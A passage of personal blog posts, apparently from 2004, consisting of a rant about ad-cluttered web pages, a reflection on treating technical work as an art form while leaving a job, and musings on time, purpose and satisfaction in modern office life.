after you've closed those ads, are there so many other ones embedded on the page that you still can't find the article, or, if you can, you can't pay any attention to it?

on the other extreme, do you have to stare at a huge block of text with no paragraph breaks for 30 minutes before giving up in frustration because, no matter how hard you try, there's just no way you can make sense out of the massive wall of verbage you're confronted with?

once you start paying attention, you may be surprised as you discover that a whole lot of the 'information super highway' is paved over by billboards these days.

and we're not talking some huge gaudy thing on the side of the road ... oh no.

these things are smack down the middle of it, crossing all 4 lanes, and to make mattters even worse, you will often be expected to pay/subscribe/sell-your-soul so that you can have the privilege of running into them as hard as you can while you travel.

that's just plain dumb.

and there's probably a whole lot more i could ramble on about that is related to this topic, but it's pretty late, and i just got distracted by these after clicking on an ad for thinkgeek.

On Being An Artist

2004-10-29T01:09:00.001-04:00

I had an interesting conversation with a co-worker yesterday.
Before I get to that though, here's some background:

I'm getting ready to leave the company I've been working at for the past 5 (almost 6) years, and move on

There is a major rollout underway currently which I have been heavily involved in, and which is in its infancy.

This project, if architected correctly could have a dramatic impact on the company, and completely change the way the business runs.

This company has had a pretty rough time of it for the past 3 years or so, and there was recently yet another wave of layoffs.

Bottom line is, at the moment, I'm the only one left of the folks that did the research and initial architecture for this project. So, now that you know all that, back to the conversation.

It went, at one point, something like this:

Me: I'm trying to explain why what we have is wrong, and let you know that I understand what the business is attempting to accomplish, but this needs to be redone before we can do anything.

Co-Worker: Well, you need to understand that I have to take everything you say with a grain of salt, because you're a short timer and on your way out the door. What you're saying may be right, or it may not, but I've got to question what you're saying, because why should you care ?

This was a very interesting question to me, and I've thought about it for the past day. As I've tossed it around in my head I came to realize two things, though I think they are actually the same, just twisted differently:

1. This person has not got any clue how I think.
2. Geeks and Managers will never understand each other.

After coming to those conclusions I realized why I cared.
I'll give you a hint: It isn't because it will help the company.

I care because it's the technically correct thing to do.

See, tech is an artform to me.
Since I have an artistic background, I actually consider it an extension of my talent; basically, 'geek' is another medium for me just like 'pen and ink', etc.

I want this done right because it's a source of personal pride.
My hand is involved in the architecture, so it had better be done right, because to do anything less is insulting to my craftsmanship and ability, not to mention a waste of my talent.

My coworker will never get that, because in his position there's not a burning passion to do things because doing it right is a thing of beauty. It's all about buzzwords, bottom lines, and 'strategic partnerships'.

At his level, it's all about who you know, and which people you do and don't piss off. Anything you need beyond that you get from skimming the headlines of trade mags.

That's why geeks and management don't understand each other.

It's the same reason that an advertising exec can't understand how an artist could spend tons of money on supplies so that they can go sit on a street in the middle of a city, and spend hours, or even days, creating a huge chalk mural which will be washed away in less than a week.

It's not about the money. (or in my case, the company and/or my loyalty to it).
It's about the art.

Maybe you already knew that, but I just figured it out

Is It Just Me?

2004-06-22T02:07:00.001-04:00

Time sucks.

Rather, the lack thereof does.
Actually, what I should say is, the “apparent” lack thereof.

We all complain about how little time we have, but I think we’re mistaken. I believe that when we say “I don’t have enough time”, we actually mean to say “I don’t have enough time to do what I want to do”, or “There’s never any time for me.”

At least, I do.

For me there simply is not enough time to do what I want. So, I’ve been wondering lately: why is that? And, is that a bad thing? I wonder if people a thousand years ago (or so) felt as though they didn't have enough time, or if it’s a relatively new social phenomenon?

As I considered those questions, I was surprised to find that the answers to them are fairly complex.

Let’s start with the problem. In this case, the issue is that I do not have enough time to do what I want to do. Note that I use the phrase "do what I want to do", and not "do what I need to do".

I've been thinking about that difference quite a bit lately.

I wonder if the "good old days" seem so much simpler to us because we have an impression of that time as one where folks simply did what they had to do, and not much more than that. We contrast that to our modern society, which has us all scrambling like rats trying to get a bunch of random crap out of the way, and it seems simpler.

At what point did we move from purposeful tasks, to scrambling?

Life a thousand years ago was certainly harder in some ways. Travel was slow and painful, and just getting the basic, life sustaining, tasks accomplished was a tedious, drawn out process. Certainly we have it better than that.

However, because it was so difficult, at the end of the day, you knew what you had accomplished. You knew it, because you had food to eat that night; You knew it, because the horses, or cattle, or chickens were in the barn, happily fed and falling asleep. (Everyone was a farmer back then, we all know that!)

You knew it, because there was freshly chopped wood to burn, that would help take the edge off the crisp autumn air. What’s more, you had time to appreciate things like the crisp autumn air, and the warmth of a nice fire back then.

That’s because life wasn't about "where do I need to be after I leave this place I’m at now; and when can I get out of here anyway?” the way it is now.

Life was hard, but because it was hard, I think folks cared more about it.

I think there's something satisfying in toiling for the things we need that is missing from our society today. I think our comfort has caused us to lose our sense of purpose. And I think because we have lost that, we are doomed to be miserable.

I also think that because we don’t really have to think too much about how we are going to live, we become more concerned with what we want, and miss out on taking joy in having our basic needs met.

Often, we choose instead to view doing those things we really need to do (getting food, keeping our living spaces clean, etc.) as a burden.

Why do we see them as a burden?
Because they prevent us from fulfilling our wants of course.
This is a mistake I think, but we do it anyway, and I’m no different.

Think about what you do for a living.

I work in an office. At the end of the day, do I know what I’ve accomplished?
Not really.

I know I put in my time, so I’ll get a paycheck at some point. And I know that I will be able to go to the store and buy some food because of that. That is how society works today (in the US anyway). I don't need to grow my own food, I just need to be able to buy it. And that’s fine, I certainly would rather buy my food, but what did I really do?

I think we (the people) are generally miserable, and I think the reason for that is simple: We get no satisfaction out of the things we're doing because we have no idea what we're really accomplishing by doing them.

Don't get me wrong here; I like what I do for a living.
I like it so much that I do it between 12 and 20 hours a day (depending on how shiny the new technology I’m playing with is.)

However, it is ultimately not satisfying.
Not in the “I worked hard, and here’s the results” way of the past.
Something inside me needs more than this.
Something inside all of us does, I think.

We're ignoring those promptings that are telling us we need more than a paycheck coming in to be content, and I think we're doing it to our peril. How long can a society that is unhappy exist before things start to break down?

I think we're going to find out fairly soon.

Then again, I could just be in a bad mood, because I don't have enough time to do what I really want to do...